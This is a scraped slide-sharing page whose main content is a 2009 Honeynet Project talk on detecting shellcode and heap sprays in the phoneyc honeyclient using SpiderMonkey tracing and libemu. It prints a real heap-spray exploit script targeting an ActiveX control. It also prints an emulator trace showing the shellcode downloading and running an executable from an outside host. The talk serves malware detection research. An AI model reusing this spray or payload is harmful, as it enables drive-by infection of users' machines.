Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

Shellcode and heapspray detection in phoneyc

  • 1. phoneyc with libemu Z. Chen phoneyc WB Malware . . Libemu Shellcode and heapspray detection in phoneyc Tracing JS . .. . . Basic Principles SCDetection Basic Idea Details Zhijie Chen1 Source Files Implementation 1 Honeynet Project Chinese Chapter HS Detection Current Results Honeynet Project on Google Summer of Code, 2009 JoYAN . . . . . .
  • 2. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 2
  • 3. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 3
  • 4. Introduction to phoneyc phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS http://code.google.com/p/phoneyc/ Basic Principles SCDetection A python honeyclient Basic Idea Details Original written by Jose Nazario. Source Files Implementation To detect Web-based Malware HS Detection Current Results JoYAN 4
  • 5. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 5
  • 6. A Typical Heapspray Mal-javascript I phoneyc with libemu 1 <body> Z. Chen <script>window.onerror=function(){return true;}</script> phoneyc <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style=’display:none’ id=’target’></object> WB Malware <SCRIPT language="javascript"> Libemu 6 var shellcode = unescape("%u9090"+"%u9090"+ Tracing JS ...(shellcode) Basic Principles "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672 SCDetection Basic Idea %u7265%u652e%u6578%u0000"); Details </script> Source Files Implementation <SCRIPT language="javascript"> HS Detection 11 var bigblock = unescape("%u9090%u9090"); Current var headersize = 20; Results var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); 16 block = bigblock.substring(0, bigblock.length−slackspace); while(block.length+slackspace<0x40000) JoYAN block = block+block+fillblock; 6
  • 7. A Typical Heapspray Mal-javascript II phoneyc with libemu memory = new Array(); Z. Chen for (x=0; x<100; x++) memory[x] = block +shellcode; 21 var buffer = ’’; phoneyc while (buffer.length < 1024) buffer+="x05"; WB Malware var ok="1111"; Libemu target.Register(ok,buffer); Tracing JS </script> Basic Principles 26 </body> SCDetection Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 7
  • 8. Heap Status After Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles | More than ??MB 0x90(NOP)s or some other x86 instructions SCDetection Basic Idea as a sledge | Shellcode | Details Source Files Implementation HS Detection Current Results JoYAN 8
  • 9. Detecting Shellcode/Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Tool: How To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 9
  • 10. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 10
  • 11. Introduction to libemu phoneyc with libemu Z. Chen . phoneyc From it’s official site: . WB Malware .. libemu is a small library written in c offering basic x86 Libemu emulation and shellcode detection using GetPC heuristics. Tracing JS Basic Principles Using libemu one can: SCDetection Basic Idea detect shellcodes Details Source Files execute the shellcodes Implementation HS Detection . profile shellcode behaviour .. . . Current Results Using libemu to detect shellcode and heapspray in web-based malware: ¡¡Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks¿¿) JoYAN 11
  • 12. Detecting x86 Instructions phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Time: When To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 12
  • 13. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 13
  • 14. Introduction to spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS What is SpiderMonkey? . Basic Principles .. SCDetection SpiderMonkey is the code-name for the Mozilla’s C Basic Idea Details implementation of Source Files Implementation JavaScript.(http://www.mozilla.org/js/spidermonkey/) . .. . . HS Detection Current Results JoYAN 14
  • 15. Basic Principles of Spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu All the javascript sources are compiled into js bytecodes. Tracing JS Basic Principles There is an interpreter who interprets the bytecodes and SCDetection Basic Idea do certain simple actions. Details Source Files All the javascript variables are stored as jsval. Implementation HS Detection Some of the values are store as an “atom”, such as strings. Current Results JoYAN 15
  • 16. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 16
  • 17. Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS As both the shellcode manipulation and the spraying of the Basic Principles fillblock involve assignments. The shellcode will be detected SCDetection Basic Idea immediately on it’s assignment if we are able to interrupt Details Source Files spidermonkey at the interpretion of certain bytecodes related to Implementation an assignment and check its argments and values for shellcodes. HS Detection Current Results JoYAN 17
  • 18. Details I phoneyc with libemu Z. Chen The following js codes: phoneyc function a(){b="c"; var a = 0;} WB Malware Libemu are compiled into bytecodes like: Tracing JS Basic Principles 00000: bindname "b" SCDetection 00003: string "c" Basic Idea 00006: setname "b" Details Source Files 4 00009: pop Implementation 00010: zero HS Detection 00011: setvar 0 Current 00014: pop Results 00015: stop So, if we examine the set* opcodes’ arguments on the top of the stack in runtime, shellcodes won’t get passed! JoYAN 18
  • 19. Details phoneyc with libemu Z. Chen phoneyc To do so, we need to: WB Malware Libemu Step trace the spidermonkey runtime. Tracing JS Stop at the key bytecodes (such as setname, setvar, Basic Principles SCDetection setprop, setarg etc.) on all kinds of Basic Idea Details assignments.Unfortunately different assignments have Source Files Implementation different bytecode accordingly. HS Detection But all the opcodes related to assignments share a Current JOF SET bit in their opcode description Results structure(./src/jsopcode.h). JoYAN 19
  • 20. Related Source files to be used later phoneyc with libemu Z. Chen phoneyc WB Malware Libemu jsapi.h:Basic APIs for javascript execution. Tracing JS Basic Principles jsdbgapi.h:Basic APIs for debugging spidermonkey. SCDetection Basic Idea jsopcode.tbl:All the js opcodes(bytecodes). Details Source Files Implementation jsinterp.c:You can find how each bytecode is interpreted HS Detection here. Current Results JoYAN 20
  • 21. Implementation phoneyc with libemu Z. Chen Register a trace handler into spidermonkey using phoneyc JS SetInterrupt. This handler will be called at each step WB Malware of the bytecode execution. Libemu In the handler: Tracing JS Use JS GetTrapOpcode to get current Basic Principles opcode(bytecode). SCDetection Basic Idea Use JS FrameIterator to get current runtime stack. Details Check the rvalue of the set* bytecodes on the top of the Source Files Implementation stack with libemu. HS Detection Dump the shellcodes and alert. Current Contine the execution. Results Privide this traced js virtual as a python module named honeyjs, so other part of phoneyc can use this module just the same as python-spidermonkey with optional awareness of the extra shellcode/heapspray detection APIs. JoYAN 21
  • 22. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 22
  • 23. Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS Heapspray . Basic Principles .. A myriad of NOP-like x86 instructions SCDetection Basic Idea Details Accumulating through a loop of assignments Source Files Implementation . Shellcode in the end of each sledge .. . . HS Detection Current Results JoYAN 23
  • 24. Basic Idea phoneyc with libemu Z. Chen phoneyc . Heapspray . WB Malware .. Libemu A myriad of NOP-like x86 instructions Tracing JS Accumulating through a loop of assignments Basic Principles SCDetection . Shellcode in the end of each sledge .. . . Basic Idea Details Source Files . Implementation Detection . .. HS Detection Now: A variable counter to record the mal-assignments Current Results (assignments containing shellcode in the r-value). . In the future: entropy ? the nozzle way? .. . . JoYAN 24
  • 25. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 25
  • 26. A Run on ssreader 0day.html I phoneyc with libemu joyan@Jdeb:˜/code/phoneyc$ sh go.sh Z. Chen 2 HONEYCLIENT MODULE TEST fetching http://172.31.25.227/phoneyc/ssreader 0day.html phoneyc [] WB Malware ==> http://172.31.25.227/phoneyc/ssreader 0day.html Libemu JS EVAL Tracing JS 7 Executing Javascript: Basic Principles DEBUG: !!!SC DETECTED at 141847268=141847572size:374 SCDetection DEBUG: !!!SC DETECTED at 141847524=141847756size:32728 Basic Idea Details DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 Source Files Implementation DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 HS Detection 12 ... Current Results DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 SSReader Pdg2 Register method overflow 17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1 Runing shellcode... offset:248 JoYAN DEBUG: Begin analyzing ... DEBUG: download http://1v1.name/server.exe −> 26
  • 27. A Run on ssreader 0day.html II phoneyc with libemu Z. Chen c:WINDOWSsystem32a.exe phoneyc 22 WB Malware ... Libemu Tracing JS URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server. Basic Principles exe’] SCDetection Done Basic Idea Details 27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1 Source Files [ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT: Implementation 100 HS Detection VBS EVAL IFRAMES [] Current Results HREFS [] FRAMES [] 32 IMAGES [] JoYAN 27
  • 28. Analysis of The Shellcode using libemu I phoneyc with libemu FARPROC WINAPI GetProcAddress ( Z. Chen HMODULE hModule = 0x7c800000 => 3 none; phoneyc LPCSTR lpProcName = 0x0041710c => WB Malware = "GetSystemDirectoryA"; Libemu ) = 0x7c814eea; Tracing JS FARPROC WINAPI GetProcAddress ( Basic Principles 8 HMODULE hModule = 0x7c800000 => SCDetection none; Basic Idea Details LPCSTR lpProcName = 0x00417120 => Source Files Implementation = "WinExec"; HS Detection ) = 0x7c86136d; Current 13 FARPROC WINAPI GetProcAddress ( Results HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417128 => = "ExitThread"; 18 ) = 0x7c80c058; JoYAN FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => 28
  • 29. Analysis of The Shellcode using libemu II phoneyc with libemu none; Z. Chen LPCSTR lpProcName = 0x00417133 => 23 = "LoadLibraryA"; phoneyc ) = 0x7c801d77; WB Malware HMODULE LoadLibraryA ( Libemu LPCTSTR lpFileName = 0x00417140 => Tracing JS = "urlmon"; Basic Principles 28 ) = 0x7df20000; SCDetection FARPROC WINAPI GetProcAddress ( Basic Idea Details HMODULE hModule = 0x7df20000 => Source Files none; Implementation LPCSTR lpProcName = 0x00417147 => HS Detection 33 = "URLDownloadToFileA"; Current ) = 0x7df7b0bb; Results UINT GetSystemDirectory ( LPTSTR lpBuffer = 0x0012fe5f => none; 38 UINT uSize = 32; ) = 19; JoYAN HRESULT URLDownloadToFile ( 29
  • 30. Analysis of The Shellcode using libemu III phoneyc with libemu Z. Chen LPUNKNOWN pCaller = 0x00000000 => phoneyc none; WB Malware 43 LPCTSTR szURL = 0x0041715a => Libemu = "http://1v1.name/server.exe"; Tracing JS LPCTSTR szFileName = 0x0012fe5f => Basic Principles = "c:WINDOWSsystem32a.exe"; SCDetection DWORD dwReserved = 0; Basic Idea Details 48 LPBINDSTATUSCALLBACK lpfnCB = 0; Source Files ) = 0; Implementation UINT WINAPI WinExec ( HS Detection LPCSTR lpCmdLine = 0x0012fe58 => Current Results = "cmd /c c:WINDOWSsystem32a.exe"; 53 UINT uCmdShow = 0; ) = 32; JoYAN 30
  • 31. phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS . Thank you! . Basic Principles SCDetection Basic Idea Details .. .. . . Source Files Implementation HS Detection Current Results JoYAN 31